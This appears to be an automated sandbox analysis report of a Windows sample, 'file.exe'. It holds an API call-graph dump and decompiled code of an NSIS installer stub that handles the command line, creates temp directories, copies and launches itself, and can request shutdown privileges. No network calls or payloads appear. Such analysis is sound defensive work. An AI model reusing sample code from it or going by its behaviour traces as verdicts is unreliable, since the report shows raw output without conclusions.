4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                          C-Code - Quality: 78%
                                                          			_entry_() {
                                                          				WCHAR* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				int _v24;
                                                          				int _v28;
                                                          				struct _TOKEN_PRIVILEGES _v40;
                                                          				signed char _v42;
                                                          				int _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v278;
                                                          				signed short _v310;
                                                          				struct _OSVERSIONINFOW _v324;
                                                          				struct _SHFILEINFOW _v1016;
                                                          				intOrPtr* _t88;
                                                          				intOrPtr* _t94;
                                                          				void _t97;
                                                          				void* _t116;
                                                          				WCHAR* _t118;
                                                          				signed int _t119;
                                                          				intOrPtr* _t123;
                                                          				void* _t137;
                                                          				void* _t143;
                                                          				void* _t148;
                                                          				void* _t152;
                                                          				void* _t157;
                                                          				signed int _t167;
                                                          				void* _t170;
                                                          				void* _t175;
                                                          				intOrPtr _t177;
                                                          				intOrPtr _t178;
                                                          				intOrPtr* _t179;
                                                          				int _t188;
                                                          				void* _t189;
                                                          				void* _t198;
                                                          				signed int _t204;
                                                          				signed int _t209;
                                                          				signed int _t214;
                                                          				int* _t218;
                                                          				signed int _t226;
                                                          				signed int _t229;
                                                          				CHAR* _t231;
                                                          				signed int _t233;
                                                          				WCHAR* _t234;
                                                          
                                                          				0x435000 = 0x20;
                                                          				_t188 = 0;
                                                          				_v24 = 0;
                                                          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                          				_v20 = 0;
                                                          				SetErrorMode(0x8001); // executed
                                                          				_v324.szCSDVersion = 0;
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v324.dwOSVersionInfoSize = 0x11c;
                                                          				if(GetVersionExW( &_v324) == 0) {
                                                          					_v324.dwOSVersionInfoSize = 0x114;
                                                          					GetVersionExW( &_v324);
                                                          					asm("sbb eax, eax");
                                                          					_v42 = 4;
                                                          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                          				}
                                                          				if(_v324.dwMajorVersion < 0xa) {
                                                          					_v310 = _v310 & 0x00000000;
                                                          				}
                                                          				 *0x42a318 = _v324.dwBuildNumber;
                                                          				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                          				if( *0x42a31e != 0x600) {
                                                          					_t179 = E00406A35(_t188);
                                                          					if(_t179 != _t188) {
                                                          						 *_t179(0xc00);
                                                          					}
                                                          				}
                                                          				_t231 = "UXTHEME";
                                                          				do {
                                                          					E004069C5(_t231); // executed
                                                          					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                          				} while ( *_t231 != 0);
                                                          				E00406A35(0xb);
                                                          				 *0x42a264 = E00406A35(9);
                                                          				_t88 = E00406A35(7);
                                                          				if(_t88 != _t188) {
                                                          					_t88 =  *_t88(0x1e);
                                                          					if(_t88 != 0) {
                                                          						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                          					}
                                                          				}
                                                          				__imp__#17();
                                                          				__imp__OleInitialize(_t188); // executed
                                                          				 *0x42a320 = _t88;
                                                          				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                          				E00406668(0x429260, L"NSIS Error");
                                                          				E00406668(0x435000, GetCommandLineW());
                                                          				_t94 = 0x435000;
                                                          				_t233 = 0x22;
                                                          				 *0x42a260 = 0x400000;
                                                          				if( *0x435000 == _t233) {
                                                          					_t94 = 0x435002;
                                                          				}
                                                          				_t198 = CharNextW(E00405F64(_t94, 0x435000));
                                                          				_v16 = _t198;
                                                          				while(1) {
                                                          					_t97 =  *_t198;
                                                          					_t251 = _t97 - _t188;
                                                          					if(_t97 == _t188) {
                                                          						break;
                                                          					}
                                                          					_t209 = 0x20;
                                                          					__eflags = _t97 - _t209;
                                                          					if(_t97 != _t209) {
                                                          						L17:
                                                          						__eflags =  *_t198 - _t233;
                                                          						_v12 = _t209;
                                                          						if( *_t198 == _t233) {
                                                          							_v12 = _t233;
                                                          							_t198 = _t198 + 2;
                                                          							__eflags = _t198;
                                                          						}
                                                          						__eflags =  *_t198 - 0x2f;
                                                          						if( *_t198 != 0x2f) {
                                                          							L32:
                                                          							_t198 = E00405F64(_t198, _v12);
                                                          							__eflags =  *_t198 - _t233;
                                                          							if(__eflags == 0) {
                                                          								_t198 = _t198 + 2;
                                                          								__eflags = _t198;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t198 = _t198 + 2;
                                                          							__eflags =  *_t198 - 0x53;
                                                          							if( *_t198 != 0x53) {
                                                          								L24:
                                                          								asm("cdq");
                                                          								asm("cdq");
                                                          								_t214 = L"NCRC" & 0x0000ffff;
                                                          								asm("cdq");
                                                          								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                          								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                          								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                          									L29:
                                                          									asm("cdq");
                                                          									asm("cdq");
                                                          									_t209 = L" /D=" & 0x0000ffff;
                                                          									asm("cdq");
                                                          									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                          									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                          									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                          										L31:
                                                          										_t233 = 0x22;
                                                          										goto L32;
                                                          									}
                                                          									__eflags =  *_t198 - _t229;
                                                          									if( *_t198 == _t229) {
                                                          										 *(_t198 - 4) = _t188;
                                                          										__eflags = _t198;
                                                          										E00406668(0x435800, _t198);
                                                          										L37:
                                                          										_t234 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                          										GetTempPathW(0x400, _t234);
                                                          										_t116 = E0040360F(_t198, _t251);
                                                          										_t252 = _t116;
                                                          										if(_t116 != 0) {
                                                          											L40:
                                                          											DeleteFileW(L"1033"); // executed
                                                          											_t118 = E004030D0(_t254, _v20); // executed
                                                          											_v8 = _t118;
                                                          											if(_t118 != _t188) {
                                                          												L68:
                                                          												ExitProcess(); // executed
                                                          												__imp__OleUninitialize(); // executed
                                                          												if(_v8 == _t188) {
                                                          													if( *0x42a2f4 == _t188) {
                                                          														L77:
                                                          														_t119 =  *0x42a30c;
                                                          														if(_t119 != 0xffffffff) {
                                                          															_v24 = _t119;
                                                          														}
                                                          														ExitProcess(_v24);
                                                          													}
                                                          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                          														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                          														_v40.PrivilegeCount = 1;
                                                          														_v28 = 2;
                                                          														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                          													}
                                                          													_t123 = E00406A35(4);
                                                          													if(_t123 == _t188) {
                                                          														L75:
                                                          														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                          															goto L77;
                                                          														}
                                                          														goto L76;
                                                          													} else {
                                                          														_push(0x80040002);
                                                          														_push(0x25);
                                                          														_push(_t188);
                                                          														_push(_t188);
                                                          														_push(_t188);
                                                          														if( *_t123() == 0) {
                                                          															L76:
                                                          															E0040140B(9);
                                                          															goto L77;
                                                          														}
                                                          														goto L75;
                                                          													}
                                                          												}
                                                          												E00405CC8(_v8, 0x200010);
                                                          												ExitProcess(2);
                                                          											}
                                                          											if( *0x42a27c == _t188) {
                                                          												L51:
                                                          												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                          												_v24 = E00403D17(_t264);
                                                          												goto L68;
                                                          											}
                                                          											_t218 = E00405F64(0x435000, _t188);
                                                          											if(_t218 < 0x435000) {
                                                          												L48:
                                                          												_t263 = _t218 - 0x435000;
                                                          												_v8 = L"Error launching installer";
                                                          												if(_t218 < 0x435000) {
                                                          													_t189 = E00405C33(__eflags);
                                                          													lstrcatW(_t234, L"~nsu");
                                                          													__eflags = _t189;
                                                          													if(_t189 != 0) {
                                                          														lstrcatW(_t234, "A");
                                                          													}
                                                          													lstrcatW(_t234, L".tmp");
                                                          													_t137 = lstrcmpiW(_t234, 0x436800);
                                                          													__eflags = _t137;
                                                          													if(_t137 == 0) {
                                                          														L67:
                                                          														_t188 = 0;
                                                          														__eflags = 0;
                                                          														goto L68;
                                                          													} else {
                                                          														__eflags = _t189;
                                                          														_push(_t234);
                                                          														if(_t189 == 0) {
                                                          															E00405C16();
                                                          														} else {
                                                          															E00405B99();
                                                          														}
                                                          														SetCurrentDirectoryW(_t234);
                                                          														__eflags =  *0x435800;
                                                          														if( *0x435800 == 0) {
                                                          															E00406668(0x435800, 0x436800);
                                                          														}
                                                          														E00406668(0x42b000, _v16);
                                                          														_t201 = "A" & 0x0000ffff;
                                                          														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                          														__eflags = _t143;
                                                          														_v12 = 0x1a;
                                                          														 *0x42b800 = _t143;
                                                          														do {
                                                          															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                          															DeleteFileW(0x420f08);
                                                          															__eflags = _v8;
                                                          															if(_v8 != 0) {
                                                          																_t148 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\file.exe", 0x420f08, 1);
                                                          																__eflags = _t148;
                                                          																if(_t148 != 0) {
                                                          																	E00406428(_t201, 0x420f08, 0);
                                                          																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                          																	_t152 = E00405C4B(0x420f08);
                                                          																	__eflags = _t152;
                                                          																	if(_t152 != 0) {
                                                          																		CloseHandle(_t152);
                                                          																		_v8 = 0;
                                                          																	}
                                                          																}
                                                          															}
                                                          															 *0x42b800 =  *0x42b800 + 1;
                                                          															_t61 =  &_v12;
                                                          															 *_t61 = _v12 - 1;
                                                          															__eflags =  *_t61;
                                                          														} while ( *_t61 != 0);
                                                          														E00406428(_t201, _t234, 0);
                                                          														goto L67;
                                                          													}
                                                          												}
                                                          												 *_t218 = _t188;
                                                          												_t221 =  &(_t218[2]);
                                                          												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                          												_t264 = _t157;
                                                          												if(_t157 == 0) {
                                                          													goto L68;
                                                          												}
                                                          												E00406668(0x435800, _t221);
                                                          												E00406668(0x436000, _t221);
                                                          												_v8 = _t188;
                                                          												goto L51;
                                                          											}
                                                          											asm("cdq");
                                                          											asm("cdq");
                                                          											asm("cdq");
                                                          											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                          											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                          											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                          												_t218 = _t218;
                                                          												if(_t218 >= 0x435000) {
                                                          													continue;
                                                          												}
                                                          												break;
                                                          											}
                                                          											_t188 = 0;
                                                          											goto L48;
                                                          										}
                                                          										GetWindowsDirectoryW(_t234, 0x3fb);
                                                          										lstrcatW(_t234, L"\\Temp");
                                                          										_t170 = E0040360F(_t198, _t252);
                                                          										_t253 = _t170;
                                                          										if(_t170 != 0) {
                                                          											goto L40;
                                                          										}
